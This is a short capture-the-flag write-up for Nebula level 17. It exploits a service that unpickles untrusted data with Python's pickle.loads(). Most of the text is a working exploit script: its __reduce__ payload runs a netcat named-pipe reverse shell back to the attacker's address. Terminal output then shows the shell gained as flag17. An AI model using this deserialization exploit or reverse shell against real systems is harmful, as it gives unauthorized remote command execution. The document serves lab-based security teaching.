Level  in nebula is pretty straight forward. The first look of it reveals the use of python's potentially vulnerable function pickle.loads(). The code simply unpickles any pickled data sent to it. We will use this vulnerability to perform command execution and gain a remote shell. Details about this can be found in paper Sour Pickles and blog.nelhage.com.
#!/usr/bin/env python #payload.py import pickle import socket import os class payload(object): def __reduce__(self): comm = "rm /tmp/shell; mknod /tmp/shell p; nc 192.168.56.1 10008 0</tmp/shell | /bin/sh 1>/tmp/shell" return (os.system, (comm,)) payload = pickle.dumps( payload()) soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM) soc.connect(("192.168.56.2", 10007)) print soc.recv(1024) soc.send(payload)
[root@renorobert 17]# python payload.py && nc -v -l 10008 Accepted connection from 192.168.56.1:56089 Connection from 192.168.56.2 port 10008 [tcp/octopus] accepted id uid=982(flag17) gid=982(flag17) groups=982(flag17)